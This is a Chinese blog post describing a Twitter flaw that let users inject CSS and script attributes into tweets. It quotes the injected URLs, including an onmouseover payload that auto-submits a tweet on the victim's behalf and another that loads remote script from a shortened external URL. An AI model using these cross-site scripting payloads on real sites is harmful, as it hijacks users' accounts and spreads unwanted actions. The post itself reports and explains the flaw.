用户发现在推特页面消息中可注入 CSS 代码的危险

@rainbowtwtr 发现在推特页面消息中注入 CSS 代码的方法,发出了一副彩虹旗(是国际同性恋利权的标志)画面:

Unknownname

比如红色彩条的代码如下:
http://twitter.com/RainbowTwtr/status/25098128726
http://twitter.com/RainbowTwtr#@“style=”background-color:red;color:red;position:absolute;top:0;left:0;width:100%;height:100%”/

我也测试发了一幅五色旗:

0unknownname

这是 twitter 服务器程序过滤用户提交的消息文字中内容不彻底造成的,可能带来安全威胁。比如如下两位开始测试如何调用外部 CSS 代码,以及令用户鼠标移动到文字上,就提交推特主页面上输入框里的文字,也就是可以诱使推特用户执行意外动作。

http://twitter.com/jak9c/status/25112535104
http://a.no/@“onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/

http://twitter.com/janlay/status/25112521002
http://t.co/@“style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:u002fu002fis.gdu002ffl9A7‘)”/

Post a comment or leave a trackback: Trackback URL.

发表评论

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / 更改 )

Twitter picture

You are commenting using your Twitter account. Log Out / 更改 )

Facebook photo

You are commenting using your Facebook account. Log Out / 更改 )

Google+ photo

You are commenting using your Google+ account. Log Out / 更改 )

Connecting to %s